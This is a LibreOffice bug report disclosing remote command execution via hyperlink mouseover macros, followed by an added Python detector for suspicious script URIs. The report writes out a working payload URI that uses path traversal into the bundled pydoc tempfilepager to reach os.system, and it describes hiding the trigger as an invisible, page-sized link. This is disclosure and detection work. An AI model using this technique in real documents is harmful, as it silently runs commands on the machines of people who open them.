https://bugs.documentfoundation.org/show_bug.cgi?id=120675

            Bug ID: 120675
           Summary: RCE/Shell command execution in LibreOffice/OpenOffice
                    via script:event-listener
           Product: LibreOffice
           Version: 6.1.2.1 release
          Hardware: All
                OS: All
            Status: UNCONFIRMED
          Severity: normal
          Priority: medium
         Component: Writer
          Assignee: libreoffice-bugs@lists.freedesktop.org
          Reporter: a...@cure53.de

Created attachment 145802
  --> https://bugs.documentfoundation.org/attachment.cgi?id=145802&action=edit
PoC_linux_drops_file_in_tmp

-----------
Verified on:
Linux
Windows 7/8.1/10

LibreOffice 6.1.2

The vulnerability will only be described for LibreOffice on Linux but a PoC for
OpenOffice/Windows can be provided as well.
-----------


LibreOffice allows assigning so-called "events" to hyperlinks. The user can
define the event (mouseover, onclick, mouseout), which triggers the execution
of a macro.
Currently LibreOffice supports 4 different types of macros: Basic, Java,
JavaScript and Python
(https://wiki.openoffice.org/wiki/Documentation/DevGuide/Scripting/Scripting_Framework_URI_Specification).

The following snippet shows the execution of the predefined python macro
TableSample.py. By using $<func_name>(<parameters>), it is possible to execute
a specific function in a python file:

<script:event-listener
  script:language="ooo:script"
  script:event-name="dom:mouseover"
  xlink:href="vnd.sun.star.script:pythonSamples|TableSample.py$createTable?language=Python&amp;location=share"
  xlink:type="simple"/>


The script is located in
/opt/libreoffice6.1/share/Scripts/python/pythonSamples/TableSample.py.
As soon as the user moves his mouse over the hyperlink, the python code gets
executed without any kind of dialog/user confirmation.

The vulnerability in LibreOffice allows loading any python script by traversing
up the file directory:
xlink:href="vnd.sun.star.script:../../../../OtherFile.py$AnyFunc(1,2)?language=Python&amp;location=share"
 

As the attacker cannot drop a custom python script on the local file system, it
is necessary to abuse an existing python script to achieve remote code
execution.
The following script inside the LibreOffice directory was chosen to achieve
command execution:

Path:

/opt/libreoffice6.1/program/python-core-3.5.5/lib/pydoc.py

Function:
tempfilepager

Code:
def tempfilepager(text, cmd):
    """Page through text by invoking a program on a temporary file."""
    import tempfile
    filename = tempfile.mktemp()
    with open(filename, 'w', errors='backslashreplace') as file:
        file.write(text)
    try:
        os.system(cmd + ' "' + filename + '"')
    finally:
        os.unlink(filename)


The tempfilepager function takes two arguments: a text, which is stored in a
temporary file, and a string, which is passed to os.system, therefore
allowing command execution:

vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager('aaa',
touch /tmp/mydroppedfile || )?language=Python&amp;location=share


It must be noted that it is not necessary that python is installed on the
targeted operating system, as LibreOffice ships its own python interpreter,
which makes the PoC really reliable.
As the PoC requires that the user moves the mouse over the hyperlink, the size
of the hyperlink text was increased so it takes up the whole page. Additionally,
its colour was set to white so it is not visible to the user.
Lastly, InBrowseMode was set to true as it increases the size of the page.



The attached PoC will work on Linux - just move the mouse around after opening
the document and touch /tmp/mydroppedfile will get executed.
To view or modify the payload, unzip the odt PoC and modify content.xml, which
contains the vnd.sun.star.script script.
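
A detection-side check for the pattern described in this report, added here as an example; it is not part of the original report or of LibreOffice. It scans the XML parts of an ODF package for vnd.sun.star.script URIs whose script location contains ".." or whose function name carries inline arguments. The function names, the two heuristics and the in-memory sample package are constructed for illustration.

```python
import io
import re
import zipfile
from urllib.parse import unquote

# Any xlink:href attribute that carries a scripting-framework URI.
SCRIPT_HREF = re.compile(r'xlink:href\s*=\s*(["\'])(vnd\.sun\.star\.script:.*?)\1')

def suspicious_reasons(uri):
    """Return why a script URI deviates from a plain 'file$function' reference."""
    # Script name = text between the scheme and the '?' query; decode
    # percent-escapes so encoded dots are compared as well.
    name = unquote(uri.split(":", 1)[1].split("?", 1)[0])
    location, _, function = name.partition("$")
    reasons = []
    if ".." in re.split(r"[|/\\]", location):
        reasons.append("path traversal in script location")
    if re.search(r"[()]", function):
        reasons.append("inline arguments after function name")
    return reasons

def scan_odf(data):
    """Scan every XML member of an ODF package (bytes); return flagged URIs."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as odf:
        for member in odf.namelist():
            if not member.endswith(".xml"):
                continue
            text = odf.read(member).decode("utf-8", errors="replace")
            for match in SCRIPT_HREF.finditer(text):
                reasons = suspicious_reasons(match.group(2))
                if reasons:
                    findings.append((member, match.group(2), reasons))
    return findings

def build_sample():
    """Constructed package holding the two generic hrefs quoted in the report."""
    hrefs = ["vnd.sun.star.script:pythonSamples|TableSample.py$createTable"
             "?language=Python&amp;location=share",
             "vnd.sun.star.script:../../../../OtherFile.py$AnyFunc(1,2)"
             "?language=Python&amp;location=share"]
    body = "".join('<script:event-listener script:event-name="dom:mouseover" '
                   'xlink:href="%s" xlink:type="simple"/>' % h for h in hrefs)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("content.xml", "<doc>%s</doc>" % body)
    return buf.getvalue()

if __name__ == "__main__":
    for member, uri, reasons in scan_odf(build_sample()):
        print(member, uri, "; ".join(reasons))
```

The TableSample.py reference passes unflagged, so documents with ordinary macro events still need a separate policy decision; only the traversal and inline-argument forms are reported.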
